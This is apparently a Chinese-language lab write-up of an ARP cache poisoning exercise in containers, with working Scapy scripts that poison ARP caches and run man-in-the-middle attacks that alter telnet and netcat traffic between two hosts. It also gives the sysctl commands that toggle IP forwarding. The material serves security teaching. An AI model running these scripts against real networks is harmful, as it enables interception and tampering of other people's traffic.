ARP
Task 1: ARP Cache Poisoning
启动容器
Task 1.A (using ARP request)
进入主机A,检查A的arp缓存(应该为空)
进入主机M,编写下列代码并运行
#!/usr/bin/python3
# Task 1.A: poison A's ARP cache with a *broadcast ARP request* sent from M.
# The request claims that B's IP (psrc) lives at M's MAC (hwsrc); a host that
# records sender mappings from requests will then send B-bound traffic to M.
# Detection/mitigation side: an IP->MAC change for 10.9.0.6 in A's cache is the
# observable symptom; static entries or switch-side ARP inspection stop it.
from scapy.all import *
# M (the attacker's container)
src_mac='02:42:0a:09:00:69'# M's MAC: the hardware address the victim will bind to B's IP
dst_mac='00:00:00:00:00:00'  # unused below: the frame is addressed with dst_mac_eth instead
dst_mac_eth='ff:ff:ff:ff:ff:ff'  # Ethernet broadcast, so every host on the segment sees the request
src_ip='10.9.0.6' # B -- the IP address being claimed (spoofed sender protocol address)
dst_ip='10.9.0.5' # any IP works as the target; the write-up uses A's address
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, pdst=dst_ip, op=1)  # op=1: who-has (ARP request)
pkt = eth / arp
sendp(pkt)  # layer-2 send of the single crafted frame
在主机A中查看arp缓存
Task 1.B (using ARP reply)
先删除主机A的ARP缓存
在M中构造应答包代码,并运行
#!/usr/bin/python3
# Task 1.B: same mapping (B's IP -> M's MAC), but carried in a unicast,
# unsolicited ARP *reply* addressed to A. The write-up reports that A's cache
# did not change after this (tcpdump saw the reply) -- consistent with a stack
# that ignores replies it never asked for when no entry exists; verify per OS.
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M -- sender hardware address (the spoofed binding)
dst_mac='02:42:0a:09:00:05' # A -- unicast to the victim, both in Ethernet and ARP headers
src_ip='10.9.0.6' # B -- the IP address being claimed
dst_ip='10.9.0.5' # A -- target protocol address
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)  # op=2: is-at (ARP reply)
pkt = eth / arp
sendp(pkt)  # layer-2 send of the single crafted frame
在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变
Task 1C (using ARP gratuitous message)
在M中编写并运行下列代码
#!/usr/bin/python3
# Task 1.C: gratuitous ARP -- a broadcast reply in which sender and target
# protocol address are both B's IP, announcing "B's IP is at M's MAC".
# As in 1.B, the write-up reports no change in A's cache; presumably only hosts
# that already hold an entry for 10.9.0.6 would refresh it -- confirm on the target.
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M -- the MAC being advertised for B's IP
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address (used for both Ether.dst and ARP.hwdst)
src_ip='10.9.0.6' # B -- sender protocol address
dst_ip='10.9.0.6' # B -- target protocol address equals the sender: the gratuitous form
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)  # op=2: is-at (reply)
pkt = eth / arp
sendp(pkt)  # layer-2 send of the single crafted frame
在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变
Task 2: MITM Attack on Telnet using ARP Cache Poisoning
Step 1
在M中编写并运行下列代码
#!/usr/bin/python3
# Task 2, Step 1: poison both ends at once. A is told "B's IP is at M's MAC" and
# B is told "A's IP is at M's MAC", so each side's frames for the other reach M.
# Whether M then drops or relays them is decided by net.ipv4.ip_forward (Steps 2-3).
from scapy.all import *
broadcast_mac = "FF:FF:FF:FF:FF:FF"  # Ethernet broadcast for both requests
# machine A
A_mac = "02:42:0a:09:00:05"  # not used in the frames below; kept for reference
A_ip = "10.9.0.5"
# machine B
B_mac = "02:42:0a:09:00:06"  # not used in the frames below; kept for reference
B_ip = "10.9.0.6"
# machine M
M_mac = "02:42:0a:09:00:69"  # the hardware address both victims end up caching
M_ip = "10.9.0.105"  # unused here: M never speaks with its own IP in these frames
# attack machine A -- request with psrc=B's IP and hwsrc=M's MAC, target A
# (op is not given; scapy's ARP default is 1, who-has, like Task 1.A)
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=B_ip, pdst=A_ip)
sendp(E/A)
# attack machine B -- mirror image: psrc=A's IP, hwsrc=M's MAC, target B
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=A_ip, pdst=B_ip)
sendp(E/A)
查看AB主机中arp缓存
Step 2
在M中关闭路由转发
# On M: disable IPv4 forwarding. Frames that the poisoned caches now steer to M are
# not relayed, which is why B's ping to A fails in Step 2 (a denial-of-service effect).
sysctl net.ipv4.ip_forward=0
在主机B中ping 主机A(无法成功)
Step 3
在M中打开路由转发
# On M: re-enable IPv4 forwarding so M relays the redirected A<->B traffic. The ping
# now succeeds (Step 3) and neither victim sees an error -- the transparent MITM case.
sysctl net.ipv4.ip_forward=1
在主机B中ping 主机A(成功)
Step 4
在M上打开包转发功能,然后在机器A上使用telnet连接B(成功连接)
关闭B的IP转发功能后,在机器A上使用telnet连接B(无法连接)
在M上编写代码并运行
#!/usr/bin/env python3
from scapy.all import *
import re
# Only the two victims' IP addresses are needed here; the capture filter further
# down selects the hosts by their real MAC addresses.
IP_A = "10.9.0.5"  # A: the telnet client in Step 4
IP_B = "10.9.0.6"  # B: the telnet server
print("********** MITM attack on Telnet **********")
def spoof_pkt(pkt):
    """sniff() callback: re-emit each captured A<->B TCP segment from M.

    A->B segments have every ASCII letter of their payload replaced by 'Z';
    B->A segments are relayed unchanged. Intended to run with IP forwarding
    disabled on M (Step 4), so the kernel does not also relay the original --
    presumably why forwarding is turned off before this script starts.
    Assumes every packet carries IP and TCP layers; the 'tcp' capture filter
    guarantees that, otherwise the layer lookups below would raise.
    """
    if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        # A -> B: rebuild the packet from its raw bytes so the copy is independent
        # of the sniffed object, then clear the checksums so scapy recomputes them.
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].payload)  # original data is stripped and re-attached below
        del(newpkt[TCP].chksum)
        if pkt[TCP].payload:
            data = pkt[TCP].payload.load
            # bytes -> str with the default (UTF-8) codec; a payload that is not
            # valid UTF-8 raises UnicodeDecodeError and this packet is not re-sent.
            data = data.decode()
            print("Old:"+data)
            # one character in, one character out, so the total length -- and with
            # it the IP length field copied above -- stays correct
            newdata = re.sub(r'[a-zA-Z]', r'Z', data)
            print("New:"+newdata)
            send(newpkt/newdata, verbose=False)
        else:
            send(newpkt, verbose=False)  # handshake / pure-ACK segment: forward as is
    elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        # B -> A: relay unmodified, checksums recomputed by scapy on send
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)
# BPF capture filter: TCP frames whose *source MAC* is A's or B's real address.
# After Step 1 both victims resolve each other's IP to M's MAC, so these frames
# arrive at M. Matching on the source MAC rather than on IP presumably keeps M's
# own re-sent copies (which carry M's MAC) out of the capture, avoiding a loop.
f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)  # blocks here; spoof_pkt runs once per captured frame
在A中使用telnet连接B,无论输入什么都会显示为Z
Task 3: MITM Attack on Netcat using ARP Cache Poisoning
可以使用以下命令在A和B之间建立netcat TCP连接
#On Host B (server, IP address is 10.9.0.6), run the following:
# Listen on TCP port 9090. The session is plaintext with no integrity protection,
# which is what lets a relaying host rewrite payload bytes unnoticed.
nc -lp 9090
#On Host A (client), run the following:
# Connect to B on port 9090; with the caches poisoned, A's frames reach M first.
nc 10.9.0.6 9090
在M中编写攻击脚本
#!/usr/bin/env python3
from scapy.all import *
# Only the two victims' IP addresses are needed here; MAC addresses appear only
# in the capture filter further down.
IP_A = "10.9.0.5"  # A: the netcat client
IP_B = "10.9.0.6"  # B: the netcat server (nc -lp 9090)
print("********** MITM attack on Netcat **********")
def spoof_pkt(pkt):
    """sniff() callback: re-emit each captured A<->B TCP segment from M.

    A->B payloads have every b'Hello' replaced by b'attacked'; B->A segments
    are relayed unchanged. Unlike the telnet variant, the payload is handled
    as bytes (no decode) and the replacement changes the length, so the IP
    total-length field is corrected by the byte difference before sending.
    Assumes every packet carries IP and TCP layers; the 'tcp' capture filter
    guarantees that, otherwise the layer lookups below would raise.
    """
    if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        # A -> B: rebuild from raw bytes and clear checksums so scapy recomputes them
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].payload)  # original data is stripped and re-attached below
        del(newpkt[TCP].chksum)
        if pkt[TCP].payload:
            data = pkt[TCP].payload.load
            print("Old:"+str(data))
            newdata = data.replace(b'Hello', b'attacked') # replace name (5 bytes -> 8 bytes per match)
            print("New:"+str(newdata))
            # the copied IP length still reflects the old payload; adjust by the size change
            newpkt[IP].len = pkt[IP].len + len(newdata) - len(data)
            send(newpkt/newdata, verbose=False)
        else:
            send(newpkt, verbose=False)  # handshake / pure-ACK segment: forward as is
    elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        # B -> A: relay unmodified, checksums recomputed by scapy on send
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)
# BPF capture filter: TCP frames whose *source MAC* is A's or B's real address.
# Both victims resolve each other's IP to M's MAC after the Task 2 poisoning, so
# these frames arrive at M; filtering on source MAC presumably excludes M's own
# re-sent copies (which carry M's MAC) and so avoids capturing them again.
f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)  # blocks here; spoof_pkt runs once per captured frame
在A中发送Hello
B中被篡改为attacked